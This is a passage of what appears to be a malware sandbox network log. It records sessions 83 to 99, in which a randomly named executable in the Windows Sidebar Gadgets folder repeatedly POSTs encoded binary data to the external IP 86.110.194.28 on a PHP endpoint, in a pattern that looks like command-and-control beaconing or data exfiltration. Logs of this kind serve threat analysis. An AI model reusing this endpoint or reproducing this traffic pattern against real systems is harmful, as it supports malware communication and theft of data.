                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
83 | 192.168.2.4 | 50027 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:32.851108074 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
Jan 3, 2025 09:08:33.207489967 CET | 2576 | OUT | Data Raw: 5b 52 5e 5b 58 5a 50 59 54 5b 59 5a 5b 56 57 53 5f 5c 5a 5f 52 55 50 43 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [R^[XZPYT[YZ[VWS_\Z_RUPC_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%?]"%E*]1$%2<=S57% $Y3:<@'8S+#Y'$X.%
Jan 3, 2025 09:08:33.543397903 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:33.681271076 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:33 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
84 | 192.168.2.4 | 50033 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:33.802814960 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
Jan 3, 2025 09:08:34.167138100 CET | 2576 | OUT | Data Raw: 5b 5d 5e 5d 5d 5d 50 5e 54 5b 59 5a 5b 52 57 5f 5f 55 5a 58 52 57 50 40 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: []^]]]P^T[YZ[RW__UZXRWP@_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%<--^") R&(+._''9&?9"P47$*8C$(?#Y'$X.5
Jan 3, 2025 09:08:34.507401943 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:34.642859936 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:34 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
85 | 192.168.2.4 | 50039 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:34.778891087 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
Jan 3, 2025 09:08:35.129354954 CET | 2576 | OUT | [encoded request body]
Jan 3, 2025 09:08:35.468282938 CET | 25 | IN | HTTP/1.1 100 Continue


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
86 | 192.168.2.4 | 50045 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:35.572487116 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 86.110.194.28
Content-Length: 2164
Expect: 100-continue
Connection: Keep-Alive
Jan 3, 2025 09:08:35.926263094 CET | 2164 | OUT | [encoded request body]
Jan 3, 2025 09:08:36.267621040 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:36.405138969 CET | 380 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 08:08:36 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 152
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
87 | 192.168.2.4 | 50047 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:35.693648100 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 86.110.194.28
Content-Length: 2568
Expect: 100-continue
Connection: Keep-Alive
Jan 3, 2025 09:08:36.051214933 CET | 2568 | OUT | [encoded request body]
Jan 3, 2025 09:08:36.377871037 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:36.509440899 CET | 207 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 08:08:36 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
88 | 192.168.2.4 | 50053 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:36.630047083 CET | 352 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 86.110.194.28
Content-Length: 2576
Expect: 100-continue
Jan 3, 2025 09:08:36.988784075 CET | 2576 | OUT | [encoded request body]
Jan 3, 2025 09:08:37.444783926 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:37.478714943 CET | 151 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 08:08:37 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
89 | 192.168.2.4 | 50059 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:37.601038933 CET | 352 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 86.110.194.28
Content-Length: 2568
Expect: 100-continue
Jan 3, 2025 09:08:37.957544088 CET | 2568 | OUT | [encoded request body]
Jan 3, 2025 09:08:38.281425953 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:38.410634995 CET | 151 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 08:08:38 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
90 | 192.168.2.4 | 50067 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:38.539078951 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 86.110.194.28
Content-Length: 2576
Expect: 100-continue
Connection: Keep-Alive
Jan 3, 2025 09:08:38.895015001 CET | 2576 | OUT | [encoded request body]
Jan 3, 2025 09:08:39.247749090 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:39.382072926 CET | 207 | IN | HTTP/1.1 200 OK
Date: Fri, 03 Jan 2025 08:08:39 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 3f 55 5d 54
Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
91 | 192.168.2.4 | 50075 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:39.549205065 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 86.110.194.28
Content-Length: 2576
Expect: 100-continue
Connection: Keep-Alive
Jan 3, 2025 09:08:39.895026922 CET | 2576 | OUT | [encoded request body]
                                                                                                                                                                  Jan 3, 2025 09:08:40.236634970 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                  Jan 3, 2025 09:08:40.366694927 CET207INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:40 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
92 | 192.168.2.4 | 50081 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:40.491331100 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
Jan 3, 2025 09:08:40.848438978 CET | 2576 | OUT | Data Raw: 5b 54 5e 59 58 58 55 5d 54 5b 59 5a 5b 55 57 58 5f 57 5a 5a 52 5d 50 47 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [T^YXXU]T[YZ[UWX_WZZR]PG_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&A?*!:/2?'>81%$%\2/!V!5P#;,X')'0?/(#Y'$X.)
Jan 3, 2025 09:08:41.177448034 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:41.307780027 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:41 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
93 | 192.168.2.4 | 50086 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:41.416997910 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2164
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
94 | 192.168.2.4 | 50087 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:41.427999020 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
Jan 3, 2025 09:08:41.801548004 CET | 2576 | OUT | Data Raw: 5e 50 5b 5f 5d 59 55 5c 54 5b 59 5a 5b 53 57 5a 5f 52 5a 5c 52 52 50 49 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^P[_]YU\T[YZ[SWZ_RZ\RRPI_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&@?5T$/')+23$-\2,)P!%Q ')3?)9#Y'$X.1
Jan 3, 2025 09:08:42.104958057 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:42.234074116 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:42 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
95 | 192.168.2.4 | 50093 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:42.364219904 CET | 352 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
Jan 3, 2025 09:08:42.752501011 CET | 2576 | OUT | Data Raw: 5b 54 5b 5d 5d 5e 50 5b 54 5b 59 5a 5b 50 57 58 5f 51 5a 54 52 5c 50 49 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [T[]]^P[T[YZ[PWX_QZTR\PI_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%(>1[!:,T1/8>]"^'4=&R $5T7X$*+'/#+)#Y'$X.
Jan 3, 2025 09:08:43.041141987 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:43.170034885 CET | 151 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:42 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
96 | 192.168.2.4 | 50100 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:43.304141998 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
Jan 3, 2025 09:08:43.660664082 CET | 2576 | OUT | Data Raw: 5e 56 5b 5b 58 57 50 59 54 5b 59 5a 5b 5f 57 5f 5f 56 5a 58 52 55 50 46 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: ^V[[XWPYT[YZ[_W__VZXRUPF_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&D(*!)0V%?8=*0=X%/1P!7)#8(%98&,'?#Y'$X.
Jan 3, 2025 09:08:44.094134092 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:44.230086088 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:43 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
97 | 192.168.2.4 | 50104 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:44.358479977 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
Jan 3, 2025 09:08:44.707519054 CET | 2576 | OUT | Data Raw: 5b 5d 5e 59 5d 5d 50 58 54 5b 59 5a 5b 55 57 5d 5f 52 5a 5b 52 5d 50 44 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: []^Y]]PXT[YZ[UW]_RZ[R]PD_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][&(]68%<>8"$&%<%S"7=T78 ]'*$E0+9#Y'$X.)
Jan 3, 2025 09:08:45.052495003 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:45.186878920 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:44 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
98 | 192.168.2.4 | 50105 | 86.110.194.28 | 80 | 7744 | C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
Timestamp | Bytes transferred | Direction | Data
Jan 3, 2025 09:08:45.316565990 CET | 376 | OUT | POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1
                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                                                  Host: 86.110.194.28
                                                                                                                                                                  Content-Length: 2576
                                                                                                                                                                  Expect: 100-continue
                                                                                                                                                                  Connection: Keep-Alive
Jan 3, 2025 09:08:45.660773039 CET | 2576 | OUT | Data Raw: 5b 50 5b 5b 58 5a 50 59 54 5b 59 5a 5b 5e 57 5d 5f 53 5a 55 52 52 50 44 5f 5d 5f 5e 5e 5e 5a 5c 41 5c 51 45 50 56 5b 53 5d 5f 5b 5f 50 52 57 5e 55 5c 43 5e 41 5c 50 5a 54 5f 56 58 55 52 59 57 59 56 5b 5a 57 52 5b 53 5b 5d 5c 5e 5c 5c 5c 56 51 56
                                                                                                                                                                  Data Ascii: [P[[XZPYT[YZ[^W]_SZURRPD_]_^^^Z\A\QEPV[S]_[_PRW^U\C^A\PZT_VXURYWYV[ZWR[S[]\^\\\VQV^XZZ_ZSVUR\_ZP]X]TZQ\X^^_]QPB_ZX^Q_ZQU^X[YQRZW\XZSWRUVX[TQ_^T\YSQ]X\TY^]\TY]_QB]FYS\_WP]UZ_XPR_ZX_]\][%(.^!:0&/$*5$=Z'/R $=V!(3$9#'$(#Y'$X.
Jan 3, 2025 09:08:46.023468018 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 3, 2025 09:08:46.160890102 CET | 207 | IN | HTTP/1.1 200 OK
                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:08:45 GMT
                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                  Content-Length: 4
                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                  Data Raw: 3f 55 5d 54
                                                                                                                                                                  Data Ascii: ?U]T


                                                                                                                                                                  Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                                                                                                  99  192.168.2.4  50106  86.110.194.28  80  7744  C:\Program Files (x86)\Windows Sidebar\Gadgets\wnWNWNYIxJtFiUSDRXunzX.exe
                                                                                                                                                                  Timestamp  Bytes transferred  Direction  Data
